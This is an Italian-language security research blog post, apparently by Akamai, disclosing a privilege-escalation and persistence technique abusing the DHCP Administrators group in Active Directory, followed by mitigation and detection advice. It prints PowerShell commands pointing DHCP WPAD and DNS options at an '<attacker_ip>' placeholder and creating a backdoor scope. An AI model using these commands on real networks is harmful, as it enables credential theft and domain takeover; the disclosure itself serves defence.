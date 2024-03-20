Abuso del gruppo di amministratori DHCP per l'escalation dei privilegi nei domini Windows
Editoriale e commenti aggiuntivi di Tricia Howard
Analisi riassuntiva
I ricercatori di Akamai hanno individuato una nuova tecnica di escalation dei privilegi negli ambienti Active Directory (AD) che sfrutta il gruppo di amministratori DHCP.
Quando il ruolo del server DHCP viene installato in un DC (Domain Controller), questo potrebbe consentire agli utenti coinvolti di ottenere privilegi di amministratore di dominio.
La tecnica si basa sull'abuso di funzioni legittime e non si affida ad alcuna vulnerabilità, pertanto non esiste una correzione specifica per questo caso.
Oltre a fornire una primitiva escalation dei privilegi, è possibile usare la stessa tecnica per creare un meccanismo di persistenza del dominio nascosto.
Il server DHCP di Microsoft è molto popolare; è stato osservato in funzione nel 40% delle reti monitorate da Akamai. Tutti gli ambienti con questo server possono risultare vulnerabili.
Ecco perché abbiamo pensato di fornire informazioni dettagliate sulle operazioni che possono ridurre notevolmente il rischio causato da questa tecnica, identificare il suo potenziale sfruttamento, nonché un modo per identificare la configurazione su cui si basa.
Introduzione
Da Google Docs ad Active Directory, la gestione degli accessi influisce praticamente su ogni ruolo all'interno di un'organizzazione. Minimizzare le frustrazioni dei dipendenti senza aggiungere rischi inutili è un equilibrio delicato quando si tratta del controllo di accessi e permessi: una brutta situazione di cui i team addetti alla sicurezza sono tristemente consapevoli.
Di conseguenza, il principio di limitare i privilegi amministrativi è un elemento cruciale di qualsiasi strategia degli accessi, che si spiega essenzialmente così: Ad ogni utente vengono concessi i privilegi richiesti per eseguire le loro mansioni, tuttavia, questi privilegi devono essere limitati il più possibile in ogni altro aspetto. In tal modo, è possibile ridurre l'impatto di una violazione su qualsiasi utente, impedendo il movimento laterale ed ulteriori sfruttamenti.
Anche se questa pratica rimuove praticamente tutti i rischi, la gestione degli accessi sulla base delle identità non è realistica né fattibile, specialmente al livello aziendale. Al contrario, i gruppi di accesso degli utenti forniscono permessi generalizzati in base alla mansione lavorativa, un concetto ampiamente visto in AD. Ad esempio, Microsoft fornisce il gruppo degli amministratori DNS, ossia un gruppo AD responsabile della gestione dei server DNS. Seguendo il principio di limitare i privilegi amministrativi, i membri di questo gruppo non hanno i permessi necessari per accedere al computer che ospita il server DNS, ma solo alla configurazione correlata al servizio DNS.
Anche se tutto ciò funziona in teoria, in pratica, è tutta un'altra storia. La ricerca di Shay Ber del 2017 ha dimostrato come i membri del gruppo degli "amministratori DNS" potrebbero abusare di uno dei privilegi del gruppo per eseguire codice sui server DNS, il che quasi sempre determina un'escalation dei privilegi ad amministratori di dominio.
Microsoft DHCP fornisce un gruppo di sicurezza simile, ossia quello degli amministratori DHCP. Durante il nostro recente lavoro di ricerca su Microsoft DHCP, ci si è posto il problema di individuare una primitiva simile utilizzando questo gruppo: Un amministratore DHCP può diventare un amministratore di dominio? Ebbene, come è risultato, spesso sicuramente succede. 🥴
In questo post del blog, ci concentreremo sul gruppo degli amministratori DHCP e mostreremo come si può abusare di uno dei suoi privilegi per violare i server DHCP, inclusa una compromissione completa del dominio nei casi in cui il server DHCP sia installato su un DC.
Mostreremo anche come sia possibile usare questa stessa tecnica per stabilire un interessante meccanismo di persistenza del dominio e forniremo le informazioni utili per implementare una "backdoor DHCP".
Poiché questa tecnica utilizza opzioni e privilegi legittimi che sono disponibili per gli amministratori DHCP, non esiste una soluzione semplice come una patch perché non esiste alcuna vulnerabilità. Per aiutare a ridurre i rischi causati da questa tecnica, in questo blog abbiamo incluso informazioni dettagliate sulle operazioni di mitigazione e rilevamento necessarie.
Chi sono gli amministratori DHCP?
Gli amministratori DHCP sono un gruppo di utenti AD che sono responsabili della gestione dei server DHCP (Dynamic Host Configuration Protocol). Questo gruppo consente ai propri membri di effettuare query e modificare la configurazione del servizio DHCP sui server remoti.
È importante notare che i membri di questo gruppo non hanno permessi sul server DHCP, ma solo sulla configurazione del servizio DHCP. Questo significa che un amministratore DHCP non dovrebbe essere in grado di eseguire codice su un server DHCP, ma solo di modificare configurazioni relative al DHCP. Una delle configurazioni controllate dagli amministratori DHCP è rappresentata dalle opzioni DHCP.
Abuso delle opzioni DHCP
I client di rete richiedono una serie di configurazioni per far parte di una rete, tra cui un indirizzo IP e una subnet mask, un indirizzo gateway predefinito e un server DNS , solo per citarne alcune. I server DHCP comunicano queste configurazioni ai loro client sotto forma di opzioni DHCP: diverse configurazioni vengono accoppiate con un ID opzione definito e vengono richieste dai client (Figura 1).
I client DHCP richiedono le opzioni desiderate e modificano la loro configurazione di rete in base alle risposte fornite. Con la possibilità di controllare i valori di queste opzioni sul server, ogni opzione richiesta da un client potrebbe potenzialmente essere sfruttata da un criminale per "iniettare" una configurazione dannosa.
Per comprendere la potenziale superficie di attacco sui client Windows, possiamo esaminare le opzioni richieste per impostazione predefinita (Figura 2).
Autorilevamento del proxy
Possiamo vedere che una delle configurazioni richieste è l'opzione "Proxy autodiscovery" (evidenziata in blu nella Figura 2), che viene utilizzata per configurare automaticamente un proxy web (WPAD). Questa opzione consente a un server DHCP di specificare l'URL di un file "wpad.dat", che contiene le impostazioni del proxy da utilizzare dal client.
Possiamo configurare questa opzione e specificare il nostro indirizzo come proxy eseguendo i comandi PowerShell riportati di seguito:
Add-DhcpServerv4OptionDefinition -name wpad -OptionId 252 -type String
Set-DhcpServerv4OptionValue -Wpad "http://<attacker_ip>/wpad.dat" -ScopeId 172.25.0.0
Una volta impostata questa opzione, notiamo che i client Windows ricevono la nostra configurazione al momento di prendere a noleggio un indirizzo dal server DHCP (Figura 3).
Dopo aver ricevuto questa configurazione, il client DHCP si connette al nostro sistema tramite HTTP e tenta di recuperare il file "wpad.dat" (Figura 4).
La capacità di impersonare un server WPAD apre la possibilità a diversi attacchi che possono consentire la compromissione delle credenziali dei client.
Esistono altre opzioni DHCP su cui possiamo concentrarci per conseguire un risultato simile. Questa capacità è certamente intrinseca e non rappresenta un problema di sicurezza. Gli amministratori DHCP possono sicuramente amministrare il protocollo DHCP. Tuttavia, l'impatto di questa capacità può risultare più ampio del previsto.
Opzione del server DHCP DNS
Durante l'analisi delle varie opzioni DHCP che è possibile sfruttare, un'altra opzione ha colto la nostra attenzione, l'opzione del server DNS. In modo simile all'attacco precedente, un amministratore DHCP può eseguire lo spoofing dell'indirizzo IP del server DNS e lo spoofing delle risposte DNS per conseguire una posizione MITM (Machine-Tn-The-Middle). Tuttavia, come è risultato, questa opzione presenta altri vantaggi.
Di solito, le opzioni DHCP vengono utilizzate per distribuire i dati ai client che li richiedono. Un aspetto interessante è che l'opzione del server DNS svolge un altro scopo, ossia il suo valore viene usato come destinazione degli aggiornamenti dinamici DHCP DNS (Figura 5).
Perché è interessante? Il server Microsoft DNS e i client Windows DNS supportano una funzione denominata aggiornamenti dinamici sicuri. Con questa funzione abilitata (per impostazione predefinita), ai client DNS viene richiesto di autenticarsi prima di eseguire gli aggiornamenti DNS sul server. Questa autenticazione viene eseguita utilizzando Kerberos tramite DNS.
Con un account amministratore DHCP, possiamo controllare l'opzione del server DNS sul server DHCP e farlo autenticare su un indirizzo di nostra scelta. Nella Figura 6, vengono mostrati i passaggi necessari per effettuare questa operazione.
Sul server DHCP di destinazione, configuriamo il nostro indirizzo IP (172.25.14.19) come l'opzione del server DNS.
Dal nostro sistema, prendiamo a noleggio un indirizzo IP specificando, al contempo, l'opzione FQDN. In questo esempio, specifichiamo l'opzione FQDN "aaa.aka.test". che attiva un aggiornamento dinamico DHCP DNS.
Il server DHCP invia una query DNS SOA (Start of Authority) al nostro sistema (supponendo che si tratti del server DNS). Questa query viene usata dal server DHCP per controllare quale server DNS è autoritativo tramite "aaa.aka.test".
Rispondiamo alla query SOA specificando il nostro sistema come il server DNS autoritativo per il record "aaa.aka.test".
Il server DHCP tenta di creare il record inviando un aggiornamento dinamico DNS al nostro sistema. Questo tentativo di aggiornamento non è autenticato, quindi
lo rifiutiamo per attivare un tentativo di autenticazione mediante il server.
Il server DHCP si autentica sul nostro sistema mediante l'autenticazione Kerberos tramite DNS, implementato con l'invio di una query TKEY.
La Figura 7 mostra un esempio di questa tecnica in azione.
Questa tecnica, che abbiamo chiamato DHCP Coerce, ci concede una primitiva coercizione dell'autenticazione Kerberos, poiché possiamo fare in modo che qualsiasi server DHCP si autentichi sul nostro sistema.
Hai domande sulla sicurezza del server DHCP?
DHCP Coerce per gli attacchi di inoltro Kerberos
DHCP Coerce apre un'opportunità per un attacco di inoltro Kerberos, ossia possiamo forzare l'autenticazione sul nostro sistema, quindi sferrare un attacco di inoltro, che ci consente di impersonare l'account del sistema server DHCP. In tal modo, possiamo ottenere il pieno controllo sul server invece dei permessi più limitati che sono inclusi nel gruppo di amministratori DHCP.
Gli obiettivi degli attacchi di inoltro Kerberos sono alquanto limitati, ma comunque abbiamo un'ottima opzione, come descritto in un post del blog di Dirk Jan, il relay Kerberos può essere utilizzato per prendere di mira Active Directory Certificate Services (AD CS).
I servizi AD CS forniscono una soluzione PKI per gli ambienti Active Directory. Nel contesto di AD, l'uso principale della soluzione PKI è consentire l'autenticazione basata su certificati: con AD CS, gli utenti possono emettere i certificati per se stessi e utilizzarli per l'autenticazione sulle risorse nel dominio.
Uno dei modi in cui questi certificati vengono emessi è il servizio Web Enrollment, un servizio web che può essere utilizzato dai client per richiedere certificati. Per impostazione predefinita, questo servizio è vulnerabile agli attacchi di inoltro Kerberos poiché non verifica l'integrità dei messaggi. Questo problema è stato descritto come ESC8 nella ricerca su AD CS condotta da Will Schroeder e Lee Christensen di SpecterOps.
Combinando la nostra primitiva autenticazione forzata con ESC8, possiamo creare una catena di attacchi (Figura 8) che ci consente di violare il server DHCP.
L'utilizzo dell'amministratore DHCP consente di forzare l'autenticazione Kerberos sul nostro sistema come descritto nella sezione precedente.
Usa Krbrelayx.py per effettuare l'inoltro dell'autenticazione verso AD CS e ottenere un certificato per l'account del sistema server DHCP.
Usa il certificato per ottenere l'hash NTLM dell'account del sistema server DHCP, una tecnica descritta nella ricerca di SpecterOps come THEFT5.
L'hash NTLM consente di effettuare l'autenticazione come account del server DHCP e di eseguire codice.
Per un approfondimento dei passaggi 2 - 4, consulta il post del blog di Dirk Jan sull'inoltro di Kerberos su DNS utilizzando krbrelayx e mitm6.
Riassumendo, se nell'ambiente si usa AD CS, un account amministratore DHCP può eseguire codice su qualsiasi server DHCP. Proprio così.
I server DHCP, molto spesso, vengono installati sui DC: il 57% delle reti che abbiamo osservato ha installato il server DHCP di Microsoft su un DC. In questi casi, un amministratore DHCP può violare l'intero dominio assumendo il controllo dell'account del sistema DC.
Nota sulle credenziali DNS
L'attacco appena descritto si basa sul server DHCP che si autentica con il suo account di sistema durante l'esecuzione degli aggiornamenti DNS. Una delle best practice consigliate da Microsoft è configurare un utente con privilegi ridotti come credenziale DNS per il server DHCP: una credenziale alternativa da utilizzare al posto dell'account del sistema durante l'esecuzione degli aggiornamenti.
Questa configurazione potrebbe rendere nullo il nostro attacco di inoltro. Invece di violare l'account di sistema del server, possiamo ottenere i permessi di un utente debole.
Per nostra fortuna, siamo gli amministratori DHCP! Un amministratore DHCP può rimuovere una credenziale DNS esistente senza conoscerla. Il comando PowerShell Remove-DhcpServerDnsCredential può essere utilizzato per eseguire questa operazione. Dopo aver rimosso la credenziale DNS, il server DHCP torna al comportamento predefinito e utilizza il proprio account del sistema per eseguire gli aggiornamenti.
Persistenza del dominio DHCP
Oltre ad abusare del gruppo di amministratori DHCP per eseguire codice sui server DHCP, è possibile utilizzare la tecnica appena descritta per creare un interessante meccanismo di persistenza del dominio.
Una volta configurata l'opzione del server DNS, non sono richieste credenziali per forzare l'autenticazione: un criminale ha solo bisogno di prendere a noleggio un indirizzo IP dal server DHCP Questo può consentire a un utente malintenzionato di eseguire un attacco DHCP Coerce dall'esterno del dominio senza alcuna credenziale.
Ambito della backdoor DHCP
Per ambito DHCP si intende una serie definita di indirizzi IP in una specifica sottorete che il DHCP può concedere in noleggio. È possibile configurare le opzioni DHCP in base all'ambito in modo diverso per le varie sottoreti.
Per sferrare un attacco di coercizione DHCP, dobbiamo cambiare l'opzione del server DNS in uno degli ambiti DHCP. Ovviamente, non vogliamo utilizzare a tale scopo un ambito esistente: se modifichiamo l'opzione del server DNS di un ambito esistente, questa configurazione verrebbe trasmessa ai client DHCP, causando problemi di comunicazione e portando al potenziale rilevamento della nostra backdoor.
Invece, vogliamo creare un ambito dedicato, con un intervallo di indirizzi che non è utilizzato in alcuna sottorete all'interno della rete (Figura 9).
Tuttavia, questo approccio presenta un problema che è radicato nella logica di selezione dell'ambito del server DHCP. Quando un client prende a noleggio un indirizzo IP, il server stabilisce l'ambito DHCP da usare in base alla sottorete di origine del client. La sottorete è identificata dall'interfaccia di rete che ha ricevuto il messaggio DHCP Discover (Figura 10).
Per attivare la backdoor, dobbiamo prendere a noleggio un indirizzo IP dal nostro ambito dannoso. Per eseguire questa operazione, dobbiamo essere presenti in una sottorete collegata a questo ambito. Allo stesso tempo, non vogliamo che il nostro ambito sia collegato ad una sottorete esistente nella rete per evitare di interrompere la connettività del client. Questi due requisiti, tuttavia, si contraddicono l'uno con l'altro: se un ambito non è collegato ad una sottorete esistente, non possiamo raggiungerlo. Viceversa, potranno raggiungerlo anche altri client. Fortunatamente, viene in aiuto un agente di inoltro DHCP.
Agente di inoltro DHCP
Una soluzione a questo problema viene fornita dalla funzione dell'agente di inoltro DHCP. Un agente di inoltro DHCP è un server progettato per consentire ai client di prendere a noleggio gli indirizzi IP da un server DHCP, anche se non presenti nella loro rete locale (Figura 11).
L'agente di inoltro ascolta i messaggi di broadcast DHCP provenienti dai client e li inoltra al server DHCP per conto dei client. L'agente di inoltro DHCP informa il server DHCP circa la sottorete di origine del client tramite l'opzione DHCP di informazione sull'agente di inoltro, che consente al server di stabilire l'ambito corretto da utilizzare durante il noleggio di un indirizzo IP.
Abbiamo notato che questa funzione consente ad un agente di inoltro DHCP di richiedere un indirizzo IP da qualsiasi ambito, indipendentemente dall'interfaccia sul server DHCP. Un criminale può fungere da agente di inoltro e indicare qualsiasi sottorete nell'opzione di informazione sull'agente di inoltro allo scopo di prendere a noleggio un indirizzo IP da qualsiasi ambito (Figura 12).
Infine, dobbiamo considerare un'ultima precisazione: l'indirizzo IP del server di inoltro deve far parte di un ambito esistente sul server allo scopo di impedire ai client non autorizzati di accedere al server. Per ovviare a questo problema, possiamo seguire la raccomandazione di Microsoft e creare un ambito dedicato che include il nostro indirizzo IP esterno, "autorizzandolo" in modo illegittimo per farlo fungere da agente di inoltro.
Abuso dell'opzione dell'agente di inoltro DHCP
Una backdoor potenziale (Figura 13) è costituita da 2 ambiti:
Ambito di autorizzazione. Un ambito concepito per autorizzare il nostro sistema di attacco per farlo fungere da agente di inoltro DHCP. Il suo intervallo di indirizzi IP deve includere l'indirizzo IP del nostro sistema di attacco esterno.
- Ambito di coercizione. Un ambito utilizzato per prendere a noleggio un indirizzo IP, che attiva un tentativo di autenticazione Kerberos sul nostro sistema di attacco. La sua opzione del server DNS verrà configurato con l'IP del nostro sistema di attacco esterno e il suo intervallo di indirizzi IP può essere qualsiasi intervallo arbitrario non utilizzato nella rete.
Il seguente codice PowerShell mostra come creare questi ambiti:
Import-Module DhcpServer
Add-DhcpServerv4Scope -StartRange <attacker_ip> -EndRange <attacker_ip> -Name " " -SubnetMask <mask>
Add-DhcpServerv4Scope -StartRange <coercion_scope_address> -EndRange <coercion_scope_address> -Name " " -SubnetMask <mask>
Set-DhcpServerv4OptionValue -OptionId 6 -Value <attacker_ip> -Force -ScopeId <coercion_scope_address>
Per attivare la backdoor, prendiamo a noleggio un indirizzo dal server DHCP apportando le seguenti modifiche:
Utilizziamo il nostro indirizzo IP nel campo DHCP dell'indirizzo IP dell'agente di inoltro (giaddr). Questo campo viene utilizzato per informare il server DHCP circa l'indirizzo IP dell'agente di inoltro. L'IP è richiesto per trovarsi all'interno dell'ambito di autorizzazione.
Includiamo l'opzione di informazione sull'agente di inoltro con un indirizzo IP che si trova all'interno dell'ambito di coercizione.
Nella Figura 14, il nostro ambito di autorizzazione include l'indirizzo IP 172.25.14.18, mentre il nostro indirizzo di coercizione include l'indirizzo 66.66.66.66.
Abbiamo aggiunto il supporto per l'agente di inoltro a DDSpoof, il nostro strumento di spoofing DHCP DNS, e creato uno script POC (Proof of Concept) chiamato dhcp_coerce.py che consente l'esecuzione di questo attacco. Lo script agisce come agente di inoltro DHCP e richiede un indirizzo IP al nostro ambito, consentendoci di attivare la coercizione dell'autenticazione tramite il nostro ambito di coercizione (Figura 15).
Soluzioni di mitigazione
Tra le misure difensive per questa minaccia, figurano le seguenti:
Identificazione della configurazione DHCP rischiosa
Mitigazione degli attacchi di inoltro contro i server AD CS
Gestione del gruppo di amministratori DHCP
Utilizzo della segmentazione per ridurre la superficie di attacco
Identificazione delle anomalie del DNS
Identificazione della configurazione DHCP rischiosa
Invoke-DHCPCheckup.ps1 può aiutarvi ad identificare la configurazione DHCP rischiosa. Il rischio maggiore nel caso di una catena di attacchi di coercizione DHCP è l'installazione di un server DHCP su un DC, una configurazione che consigliamo di evitare.
Esegui il comando Invoke-DHCPCheckup per elencare tutti i server DHCP di Microsoft attivi e per identificare quelli eventualmente installati sui DC (Figura 16). Se possibile, disattiva il servizio del server DHCP su tutti i DC.
Mitigazione degli attacchi di inoltro contro i server AD CS
Il modo più efficace per prevenire questa catena di attacchi è mitigare gli attacchi di inoltro contro i server AD CS, che contrastano la capacità di violare la primitiva coercizione dell'autenticazione.
Il rischio di subire attacchi di inoltro e le relative variazioni per i server AD CS non è nuovo ed è noto a Microsoft. Extended Protection for Authentication (EPA) è stata introdotta per prevenire questo tipo di attacchi, ma non è attivata per impostazione predefinita sui server AD CS. Per mitigare il rischio di attacchi di inoltro contro i server AD CS, disattiva il protocollo HTTP e attiva la funzione EPA su tutti i server AD CS.
Gestione del gruppo di amministratori DHCP
I membri del gruppo di amministratori DHCP possono potenzialmente violare client e server DHCP, pertanto questo gruppo va trattato come una risorsa preziosa e monitorato di conseguenza. Limita il più possibile il numero di membri del gruppo di amministratori DHCP per ridurre il rischio di violazione di un amministratore. Valuta l'utilizzo del gruppo di utenti DHCP, che presenta privilegi più limitati, nei casi applicabili.
Utilizzo della segmentazione per ridurre la superficie di attacco
Oltre alle misure difensive descritte in precedenza, è possibile usare la segmentazione di rete per mitigare l'attacco e ridurre la superficie di attacco, potenzialmente prevenendo attacchi simili.
Utilizzando Akamai Guardicore Segmentation, gli addetti alla sicurezza possono
Blocca il traffico RPC verso i server DHCP da endpoint non amministrativi, impedendo la possibilità di modificare le opzioni DHCP: crea un'etichetta contenente gli endpoint utilizzati dagli amministratori DHCP, quindi consenti solo a questa etichetta di comunicare con i server DHCP tramite le porte non DHCP.
Blocca l'accesso ai server di registrazione AD CS per gli endpoint che non lo richiedono per ridurre la possibilità di sferrare attacchi di inoltro: crea un'etichetta contenente gli endpoint che richiedono l'emissione di certificati tramite AD CS, quindi consenti solo a questa etichetta di comunicare con i server di registrazione web.
Blocca il traffico DHCP diretto e proveniente da Internet, impedendo ai sistemi esterni di forzare l'autenticazione DHCP: crea un'etichetta per tutti i server DHCP, quindi blocca tutte le comunicazioni con gli indirizzi Internet.
Identificazione delle anomalie del DNS
L'attacco forza il server DHCP ad inviare una richiesta di aggiornamento del DNS ad un indirizzo diverso da quello del server AD DNS standard. Questo tipo di traffico, di solito, è statico per natura, pertanto questo comportamento risulta estremamente anomalo. Questo comportamento anomalo del traffico può rappresentare un'opportunità di rilevamento per questo attacco o per qualsiasi altro attacco che sfrutta l'autenticazione Kerberos tramite DNS.
Per identificare tali anomalie, crea un elenco di server DNS legittimi che dovrebbero ricevere gli aggiornamenti del DNS, sia inviando query al sistema AD che monitorando il traffico DNS. Questo elenco deve essere alquanto ridotto e va usato come riferimento per il traffico legittimo. Eventuali deviazioni da questo elenco vanno esaminate, specialmente se riguardano indirizzi Internet.
Akamai Hunt, il servizio gestito di ricerca delle minacce di Akamai, offre ai suoi clienti la massima protezione grazie ad un'ampia gamma di tecniche di rilevamento delle anomalie, che monitorano costantemente l'ambiente nel tentativo di rilevare comportamenti insoliti.
Conclusione
L'escalation dei privilegi dannosi può risultare devastante, specialmente quando si tratta di processi legittimi. Raggiungere un equilibrio tra rigorosi controlli di sicurezza e il minimo problema per gli utenti rappresenta un importante dilemma per i moderni professionisti della sicurezza. Con l'introduzione dell'IoT (Internet of Things), una forza lavoro sempre più mobile e il costante aumento nello sfruttamento di vulnerabilità vecchie e nuove, non è mai stato così importante come ora riuscire a gestire la strategia degli accessi.
Il gruppo di amministratori DHCP è un illuminante esempio di questo concetto poiché fornisce ai suoi membri una serie di permessi, che, tuttavia, possono essere sfruttati dai criminali. Specialmente nel campo della sicurezza, è possibile sfruttare anche le funzioni più innocue.
Gli addetti alla sicurezza devono essere consapevoli di questo rischio potenziale e considerare questo gruppo con la dovuta cautela. Speriamo che questo post abbia fornito appropriate informazioni sul contesto e le misure con cui difendersi da questa minaccia.
Ulteriori informazioni
Per ulteriori informazioni sui rischi correlati ai server DHCP di Microsoft, puoi consultare gli altri blog sull'argomento:
Spoofing dei record DNS tramite l'abuso degli aggiornamenti dinamici DHCP DNS
Utilizzo dello spoofing DHCP DNS - Guida pratica
L'Akamai Security Intelligence Group continuerà a monitorare questa minaccia e altre minacce simili e pubblicherà i risultati delle sue ricerche. Per tenervi aggiornati sugli aggiornamenti su DHCP e su altre ricerche sulla sicurezza, puoi seguirci su X (in precedenza Twitter).